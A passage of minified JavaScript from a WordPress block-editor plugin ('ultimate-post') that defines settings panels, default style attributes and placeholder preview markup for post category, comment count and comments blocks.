Padding","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{initialOpen:!1,title:__("Category Label","ultimate-post"),depend:"catLabelShow",include:[{data:{type:"text",key:"catLabel",label:__("Label Text","ultimate-post")}},{data:{type:"color",key:"catLabelColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"catLabelTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"catLabelSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Label Spacing","ultimate-post")}},{data:{type:"color2",key:"catLabelBgColor",label:__("Background","ultimate-post")}},{data:{type:"border",key:"catLabelBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"catLabelRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"catLabelPad",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{title:__("Category Icon","ultimate-post"),depend:"catIconShow",include:[{data:{type:"icon",key:"catIconStyle",label:__("Select Icon","ultimate-post")}},{data:{type:"color",key:"catIconColor",label:__("Icon Color","ultimate-post")}},{data:{type:"color",key:"catIconHovColor",label:__("Icon Hover Color","ultimate-post")}},{data:{type:"range",key:"catIconSize",min:10,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")}},{data:{type:"range",key:"catIconSpace",min:10,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")}}],store:T})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:T}),(0,o.createElement)(i.Mg,{pro:!0,store:T}),(0,o.createElement)(i.iv,{store:T}))),(0,i.dH)()),(0,o.createElement)("div",_,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-category"},f&&a.ZP[k],v&&(0,o.createElement)("div",{className:"cat-builder-label"},h),(0,o.createElement)("div",{className:"cat-builder-content"},(0,o.createElement)("a",{className:"ultp-category-list",href:"#"},"Dummy Cat1"),w?" "+w:""," ",(0,o.createElement)("a",{className:"ultp-category-list",href:"#"},"Dummy Cat2"),w?" "+w:""," ",(0,o.createElement)("a",{className:"ultp-category-list",href:"#"},"Dummy Cat3"))))))}},88451:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},catLabelShow:{type:"boolean",default:!0},catIconShow:{type:"boolean",default:!0},catColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .cat-builder-content a, {{ULTP}} .cat-builder-content {color:{{catColor}} !important;}"}]},catBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-category-list"}]},catItemBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#e2e2e2",type:"solid"},style:[{selector:"{{ULTP}} .ultp-category-list"}]},catRadius:{type:"object",default:{top:3,right:3,bottom:3,left:3,unit:"px"},style:[{selector:"{{ULTP}} .ultp-category-list { border-radius:{{catRadius}}; }"}]},catHovColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-category .cat-builder-content > a:hover { color:{{catHovColor}} !important; }"}]},catBgHovColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-category-list:hover"}]},catItemHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#323232",type:"solid"},style:[{selector:"{{ULTP}} .ultp-category-list:hover"}]},catHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-category-list:hover { border-radius:{{catHoverRadius}}; }"}]},catTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{selector:"{{ULTP}} .ultp-category-list"}]},catSeparator:{type:"string",default:""},catSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} .ultp-category-list:not(:first-child) {margin-left:{{catSpace}}}"}]},catItemPad:{type:"object",default:{lg:{top:"0",bottom:"0",left:"10",right:"10",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-category-list { padding:{{catItemPad}} }"}]},catAlign:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-category {justify-content:{{catAlign}}}"}]},catLabel:{type:"string",default:"Category : ",style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}]}]},catLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label {color:{{catLabelColor}};}"}]},catLabelTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label"}]},catLabelSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label {margin-right:{{catLabelSpace}}}"}]},catLabelBgColor:{type:"object",default:[],style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label"}]},catLabelBorder:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label"}]},catLabelRadius:{type:"object",default:[],style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label { border-radius:{{catLabelRadius}}; }"}]},catLabelPad:{type:"object",default:{},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .cat-builder-label { padding:{{catLabelPad}} }"}]},catIconStyle:{type:"string",default:"",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}]}]},catIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-category svg { color:{{catIconColor}}; color:{{catIconColor}} }"}]},catIconHovColor:{type:"string",default:"",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-category svg:hover { color:{{catIconHovColor}}; color:{{catIconHovColor}} }"}]},catIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-category svg { height:{{catIconSize}}; width:{{catIconSize}} }"}]},catIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-category svg {margin-right:{{catIconSpace}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},1818:(e,t,l)=>{"use strict";var o=l(67294),a=l(52106),i=l(88451),n=l(72927);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/category.svg",alt:"Post Category"}),attributes:i.Z,edit:a.Z,save:()=>null})},24557:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,clientId:d,className:m,attributes:g,attributes:{blockId:y,advanceId:b,commentLabelText:v,commentIconStyle:h,commentLabel:f,commentIconShow:k,currentPostId:w}}=e,x={setAttributes:t,name:l,attributes:g,clientId:d};(0,s.S)({blockId:y,clientId:d,currentPostId:w,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(g,"ultimate-post/post-comment-count",y);const T=c({className:`ultp-block-${y} ${m}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",include:[{data:{type:"toggle",key:"commentLabel",label:__("Enable Prefix","ultimate-post")}},{data:{type:"color",key:"commentColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"commentTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"commentCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post"),options:["flex-start","center","flex-end"]}},{data:{type:"text",key:"commentLabelText",label:__("Text","ultimate-post")}},{data:{type:"group",key:"commentLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")}}],store:x}),(0,o.createElement)(i.T,{title:__("Icon Style","ultimate-post"),depend:"commentIconShow",initialOpen:!0,include:[{data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{data:{type:"icon",key:"commentIconStyle",label:__("Icon Style","ultimate-post")}},{data:{type:"range",key:"commentIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"commentSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:x})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:x}),(0,o.createElement)(i.Mg,{pro:!0,store:x}),(0,o.createElement)(i.iv,{store:x}))),(0,i.dH)()),(0,o.createElement)("div",T,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("span",{className:"ultp-comment-count"},k&&""!=h&&a.ZP[h],(0,o.createElement)("div",null,"12 "),f&&(0,o.createElement)("span",{className:"ultp-comment-label"},v)))))}},22707:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},commentLabel:{type:"boolean",default:!0},commentIconShow:{type:"boolean",default:!0},commentColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-comment-count { color:{{commentColor}} }"}]},commentTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-count"}]},commentCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-comment-count { justify-content: {{commentCountAlign}};}"}]},commentLabelText:{type:"string",default:"comment ",style:[{depends:[{key:"commentLabel",condition:"==",value:!0}]}]},commentLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"commentLabelAlign",condition:"==",value:"before"},{key:"commentLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count .ultp-comment-label {order: -1;margin-right: 5px;}"},{depends:[{key:"commentLabelAlign",condition:"==",value:"after"},{key:"commentLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count .ultp-comment-label {order: unset; margin-left: 5px;}"}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"commentIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count > svg { color:{{iconColor}}; color:{{iconColor}};}"}]},commentIconStyle:{type:"string",default:"commentCount1",style:[{depends:[{key:"commentIconShow",condition:"==",value:!0}]}]},commentIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"commentIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count svg{ width:{{commentIconSize}}; height:{{commentIconSize}} }"}]},commentSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"commentIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count > svg { margin-right: {{commentSpace}} }"},{depends:[{key:"commentIconShow",condition:"==",value:!0},{key:"commentLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-comment-count > svg { margin: {{commentSpace}} } {{ULTP}} .ultp-comment-count .ultp-comment-label {margin: 0px !important;}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},29044:(e,t,l)=>{"use strict";var o=l(67294),a=l(24557),i=l(22707),n=l(30577);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/comment_count.svg",alt:"Post Comment Count"}),attributes:i.Z,edit:a.Z,save:()=>null})},44473:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(31760),s=l(17655);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,layout:v,leaveRepText:h,replyHeading:f,inputLabel:k,cookiesText:w,subBtnText:x,replyText:T,commentCount:_,authMeta:C,authImg:E,cookiesEnable:S,cmntInputText:P,emailInputText:L,nameInputText:I,webInputText:B,inputPlaceHolder:U,currentPostId:M}}=e,A={setAttributes:t,name:l,attributes:d,clientId:m};(0,n.S)({blockId:y,clientId:m,currentPostId:M,setAttributes:t,checkRef:!1}),y&&(0,i.Kh)(d,"ultimate-post/post-comments",y);const H=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(s.Z,{store:A}),(0,a.dH)()),(0,o.createElement)(r.Z,{include:[{type:"layout",key:"layout",pro:!1,tab:!0,label:__("Select Advanced Layout","ultimate-post"),block:"related-posts",options:[{img:"assets/img/layouts/builder/comments/comment1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/builder/comments/comment2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!1},{img:"assets/img/layouts/builder/comments/comment3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!1}]}],store:A}),(0,o.createElement)("div",H,(0,o.createElement)("div",{className:`ultp-block-wrapper ultp-comment-form ultp-comments-${v}`},(0,o.createElement)("div",{className:"ultp-builder-comment-reply"},(0,o.createElement)("div",{className:"ultp-comment-reply-heading"},_&&"05"," ",T),(0,o.createElement)("ul",{className:"ultp-comment-wrapper ultp-builder-comment-reply"},(0,o.createElement)("li",null,(0,o.createElement)("div",{className:"ultp-comment-content-heading"},E&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null,"Christopher Timmons"),C&&(0,o.createElement)("span",null," ",'July 19, 2021 at 3:45 PM"'," "))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"),(0,o.createElement)("ul",{className:"ultp-reply-wrapper"},(0,o.createElement)("li",{className:"ultp-reply-content"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/builder/replay_icon.svg"}),(0,o.createElement)("div",{className:"ultp-reply-content-main"},(0,o.createElement)("div",{className:"ultp-comment-content-heading"},E&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null," Richard Jackson"),C&&(0,o.createElement)("span",null," ",'July 19, 2021 at 3:45 PM"'," "))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"))),(0,o.createElement)("li",{className:"ultp-reply-content"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/builder/replay_icon.svg"}),(0,o.createElement)("div",{className:"ultp-reply-content-main"},(0,o.createElement)("div",{className:"ultp-comment-content-heading"},E&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null,"Joan May"),C&&(0,o.createElement)("span",null," ",'July 19, 2021 at 3:45 PM"'," "))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"))))),(0,o.createElement)("li",null,(0,o.createElement)("div",{className:"ultp-comment-content-heading"},E&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null,"Gary Bogart"),C&&(0,o.createElement)("span",null,"July 19, 2021 at 3:45 PM"))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"),(0,o.createElement)("ul",{className:"ultp-reply-wrapper"},(0,o.createElement)("li",{className:"ultp-reply-content"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/builder/replay_icon.svg"}),(0,o.createElement)("div",{className:"ultp-reply-content-main"},(0,o.createElement)("div",{className:"ultp-comment-content-heading"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null,"Mario Whitted"),C&&(0,o.createElement)("span",null,"July 19, 2021 at 3:45 PM"))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"))))))),(0,o.createElement)("div",{className:`ultp-builder-comments ultp-comments-${v}`},(0,o.createElement)("div",{className:"ultp-comments-heading"},f&&(0,o.createElement)("div",{className:"ultp-comments-title"},h),(0,o.createElement)("span",{className:"ultp-comments-subtitle"},"Your email address will not be published. Required fields are marked *")),(0,o.createElement)("div",{className:"ultp-comment-form comment-form-comment"},(0,o.createElement)("div",{className:"ultp-comment-input ultp-field-control "},k&&(0,o.createElement)("label",null,P," ",(0,o.createElement)("span",null,"*")),(0,o.createElement)("textarea",{placeholder:U})),(0,o.createElement)("div",{className:"ultp-comment-name ultp-field-control "},k&&(0,o.createElement)("label",null," ",I," ",(0,o.createElement)("span",null,"*")),(0,o.createElement)("input",{type:"name"})),(0,o.createElement)("div",{className:"ultp-comment-email ultp-field-control "},k&&(0,o.createElement)("label",null,L," ",(0,o.createElement)("span",null,"*")),(0,o.createElement)("input",{type:"email"})),(0,o.createElement)("div",{className:"ultp-comment-website ultp-field-control "},k&&(0,o.createElement)("label",null,B," ",(0,o.createElement)("span",null,"*")),(0,o.createElement)("input",{type:"text"}))),S&&(0,o.createElement)("p",{className:"comment-form-cookies-consent"},(0,o.createElement)("input",{id:"wp-comment-cookies-consent",name:"wp-comment-cookies-consent",type:"checkbox",value:"yes"})," ",(0,o.createElement)("label",{htmlFor:"wp-comment-cookies-consent"},w)),(0,o.createElement)("button",{className:"ultp-comment-btn",id:"submit"},x)))))}},17655:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"layout",key:"layout",pro:!1,tab:!0,label:__("Select Advanced Layout","ultimate-post"),block:"related-posts",options:[{img:"assets/img/layouts/builder/comments/comment1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/builder/comments/comment2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/builder/comments/comment3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0}]}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Comments Form Heading","ultimate-post"),depend:"replyHeading",include:[{data:{type:"text",key:"leaveRepText",label:__("Leave a reply text","ultimate-post")}},{data:{type:"color",key:"HeadingColor",label:__("Heading Color","ultimate-post")}},{data:{type:"typography",key:"HeadingTypo",label:__("Heading Typography","ultimate-post")}},{data:{type:"color",key:"subHeadingColor",label:__("Sub Heading Color","ultimate-post")}},{data:{type:"range",key:"headingSpace",min:1,max:150,step:1,unit:!0,responsive:!0,label:__("Heading Spacing","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Comments Form Input","ultimate-post"),include:[{data:{type:"separator",label:__("Input Style","ultimate-post")}},{data:{type:"text",key:"inputPlaceHolder",label:__("Textarea Placeholder","ultimate-post")}},{data:{type:"color",key:"inputPlaceValueColor",label:__("Placeholder Color","ultimate-post")}},{data:{type:"color",key:"inputValueColor",label:__("Input Color","ultimate-post")}},{data:{type:"color",key:"inputValueBg",label:__("Input Background Color","ultimate-post")}},{data:{type:"typography",key:"inputValueTypo",label:__("Input Typography","ultimate-post")}},{data:{type:"dimension",key:"inputValuePad",step:1,unit:!0,responsive:!0,label:__("Input Padding","ultimate-post")}},{data:{type:"border",key:"inputBorder",label:__("Input Border","ultimate-post")}},{data:{type:"border",key:"inputHovBorder",label:__("Input Hover Border","ultimate-post")}},{data:{type:"dimension",key:"inputRadius",step:1,unit:!0,responsive:!0,label:__("Input Border Radius","ultimate-post")}},{data:{type:"dimension",key:"inputHovRadius",step:1,unit:!0,label:__("Input Hover Radius","ultimate-post")}},{data:{type:"range",key:"inputSpacing",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Spacing","ultimate-post")}},{data:{type:"separator",label:__("Label Style","ultimate-post")}},{data:{type:"toggle",key:"inputLabel",label:__("Input Label","ultimate-post")}},{data:{type:"text",key:"cmntInputText",label:__("Input Label","ultimate-post")}},{data:{type:"text",key:"nameInputText",label:__("Input Label","ultimate-post")}},{data:{type:"text",key:"emailInputText",label:__("Input Label","ultimate-post")}},{data:{type:"text",key:"webInputText",label:__("Input Label","ultimate-post")}},{data:{type:"color",key:"inputLabelColor",label:__("Label Color","ultimate-post")}},{data:{type:"typography",key:"inputLabelTypo",label:__("Label Typography","ultimate-post")}},{data:{type:"toggle",key:"disableWebUrl",label:__("Disable Web URL","ultimate-post")}},{data:{type:"toggle",key:"cookiesEnable",label:__("Cookies Enable","ultimate-post")}},{data:{type:"text",key:"cookiesText",label:__("Cookies Text","ultimate-post")}},{data:{type:"color",key:"cookiesColor",label:__("Cookies Text Color","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Submit Button","ultimate-post"),include:[{data:{type:"text",key:"subBtnText",label:__("Submit Button Text","ultimate-post")}},{data:{type:"typography",key:"subBtnTypo",label:__("Text Typography","ultimate-post")}},{data:{type:"tab",key:"submitButton",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"subBtnColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"subBtnBg",label:__("Background Color","ultimate-post")},{type:"border",key:"subBtnBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"subBtnRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"subBtnHovColor",label:__("Text Hover Color","ultimate-post")},{type:"color2",key:"subBtnHovBg",label:__("Background Hover Color","ultimate-post")},{type:"border",key:"subBtnHovBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"subBtnHovRadius",step:1,unit:!0,responsive:!0,label:__("Hover Radius","ultimate-post")}]}]}},{data:{type:"dimension",key:"subBtnPad",step:1,unit:!0,responsive:!0,label:__("Button Padding","ultimate-post")}},{data:{type:"range",key:"subBtnSpace",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Spacing","ultimate-post")}},{data:{type:"alignment",key:"subBtnAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!0,title:__("Comments & Reply","ultimate-post"),include:[{data:{type:"separator",label:__("Commenter Name Style","ultimate-post")}},{data:{type:"color",key:"authColor",label:__("Name Color","ultimate-post")}},{data:{type:"color",key:"authHovColor",label:__("Name Hover Color","ultimate-post")}},{data:{type:"typography",key:"authorTypo",label:__("Typography","ultimate-post")}},{data:{type:"dimension",key:"commentSpace",step:1,unit:!0,responsive:!0,label:__("Spacing","ultimate-post")}},{data:{type:"text",key:"replyText",label:__("Comments Text","ultimate-post")}},{data:{type:"toggle",key:"commentCount",label:__("Comment Count","ultimate-post")}},{data:{type:"color",key:"commentCountColor",label:__("Text Color","ultimate-post")}},{data:{type:"typography",key:"commentCountTypo",label:__("Text Typography","ultimate-post")}},{data:{type:"range",key:"commentCountSpace",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Comment Count Spacing","ultimate-post")}},{data:{type:"separator",label:__("Button Style","ultimate-post")}},{data:{type:"typography",key:"replyBtnTypo",label:__("Button Typography","ultimate-post")}},{data:{type:"tab",key:"replyButton",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"replyBtnColor",label:__("Reply Button","ultimate-post")},{type:"color2",key:"replyBtnBg",label:__("Background","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"replyBtnHovColor",label:__("Reply Button","ultimate-post")},{type:"color2",key:"replyBtnBgHov",label:__("Background","ultimate-post")}]}]}},{data:{type:"border",key:"replyBtnBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"replyBtnRadius",step:1,unit:!0,responsive:!0,label:__("Radius","ultimate-post")}},{data:{type:"dimension",key:"replyBtnPad",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{data:{type:"range",key:"replyBtnSpace",min:1,max:300,responsive:!0,step:1,unit:!0,label:__("Reply Button Spacing","ultimate-post")}},{data:{type:"separator",label:__("Commenter Meta","ultimate-post")}},{data:{type:"range",key:"authMetaSpace",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Meta Spacing","ultimate-post")}},{data:{type:"toggle",key:"authMeta",label:__("Commenter Meta","ultimate-post")}},{data:{type:"color",key:"authMetaColor",label:__("Meta Color","ultimate-post")}},{data:{type:"color",key:"authMetaHovColor",label:__("Meta Color Hover","ultimate-post")}},{data:{type:"typography",key:"authMetaTypo",label:__("Meta Typography","ultimate-post")}},{data:{type:"separator",label:__("Commenter Image","ultimate-post")}},{data:{type:"toggle",key:"authImg",label:__("Commenter Image","ultimate-post")}},{data:{type:"dimension",key:"authImgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}},{data:{type:"separator",label:__("Reply Style","ultimate-post")}},{data:{type:"color",key:"replyColor",label:__("Reply Color","ultimate-post")}},{data:{type:"color",key:"replyHovColor",label:__("Reply Hover Color","ultimate-post")}},{data:{type:"typography",key:"replyTypo",label:__("Reply Typography","ultimate-post")}},{data:{type:"separator",label:__("Reply Separator","ultimate-post")}},{data:{type:"toggle",key:"replySeparator",label:__("Reply Separator","ultimate-post")}},{data:{type:"color",key:"replySepColor",label:__("Separator Color","ultimate-post")}},{data:{type:"range",key:"replySepSpace",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Separator Space","ultimate-post")}},{data:{type:"separator",label:__("Replay Cancel Style","ultimate-post")}},{data:{type:"color",key:"replyCancelColor",label:__("Replay Cancel Color","ultimate-post")}},{data:{type:"color",key:"replyCancelHoverColor",label:__("Replay Cancel Hover Color","ultimate-post")}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e}))))},34701:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},replyHeading:{type:"boolean",default:!0},leaveRepText:{type:"string",default:"Leave a Reply",style:[{depends:[{key:"replyHeading",condition:"==",value:!0}]}]},HeadingColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"replyHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comments-title, \n        {{ULTP}} .comment-reply-title { color:{{HeadingColor}} }"}]},HeadingTypo:{type:"object",default:{openTypography:1,size:{lg:24,unit:"px"},height:{lg:26,unit:"px"}},style:[{depends:[{key:"replyHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comments-title, \n        {{ULTP}} .comment-reply-title, \n        {{ULTP}} .comment-reply-title a, \n        {{ULTP}} #reply-title"}]},subHeadingColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"replyHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comments-subtitle,\n          {{ULTP}} .logged-in-as, \n          {{ULTP}} .comment-notes { color:{{subHeadingColor}} }"}]},headingSpace:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"replyHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comments-title { margin-bottom:{{headingSpace}} !important; }"}]},inputPlaceHolder:{type:"string",default:"Express your 